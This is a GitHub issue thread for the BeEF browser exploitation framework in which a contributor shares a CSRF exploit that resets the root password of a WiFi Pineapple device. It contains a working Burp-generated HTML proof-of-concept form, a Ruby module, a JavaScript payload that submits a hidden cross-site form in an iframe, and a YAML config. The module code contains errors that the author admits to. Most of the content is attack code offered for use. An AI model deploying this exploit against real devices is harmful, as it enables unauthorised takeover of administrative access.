### ISSUE TITLE
CSRF Root Password reset for the WiFi Pineapple

### ISSUE THREAD

**Issue by n0x00** [beefproject/beef#897]
It's only fair ... 

so I tried to make the module and bastardised previous modules that bcoles and antisnatchor had helped with but I haven't amerced my self in ruby half as much as i'd like ... so i'm still pretty crap with it

happy to share what I have but I have also stuck the CSRF via burps generator in - I would like to see where I have gone wrong, then I can add more without bothering you lot.

The problem is that the pineapple has no CSRF defence (Like most cheap devices) but additionally doesn't require your current password to update to a new one - cool.

Code from Burp:

```
<html>
 CSRF PoC - username is root - default administration port is 1471  //generated by Burp Suite Professional 
<body>
<form action="http://172.16.42.1:1471/index.php?advanced" method="POST">
<input type="hidden" name="pass" value="badhacker" />
<input type="hidden" name="pass2" value="badhacker" />
<input type="hidden" name="changePass" value="Change&#32;Password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
```

_notes_ the pineapple address is subject to change -

Now my crap - so you can tell me what I missed (please):

Or just use the burp file to create it all and let me compare the difference :8ball: 

Module.rb:

```
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class WiFiPineapple_pwd_reset < BeEF::Core::Command

    def self.options
        return [
            {'name' => 'base', 'ui_label' => 'Pineapple Location', 'value' => 'http://172.16.42.1:1471/'},
            {'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
            {'name' => 'pass2', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
        ]
    end

    def post_execute
        save({'result' => @datastore['result']})
    end

end

```
# 

commands.js:

```
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
  var gateway = '<%= @base %>'; 
  var path    = 'index.php?advanced';
  var passwd  = '<%= @password %>';

  var WiFiPineapple_pwd_reset = beef.dom.createIframeXsrfForm(gateway + path, "POST",
    [{'type':'hidden', 'name':'pass',          'value':passwd},
     {'type':'hidden', 'name':'pass2',         'value':passwd},
    ]);

  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

  cleanup = function() {
    document.body.removeChild(WiFiPineapple_pwd_reset);
  }
  setTimeout("cleanup()", 15000);

});
```
# 

```
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    module:
        WiFiPineapple_pwd_reset:
            enable: true
            category: ["Exploits", "CounterHack"]
            name: "Wifi Pineapple Root Password CSRF"
            description: "Attempts to change the root password on a WiFi Pineapple."
            authors: ["n0x00"]
            target:
                working: ["ALL"]

```
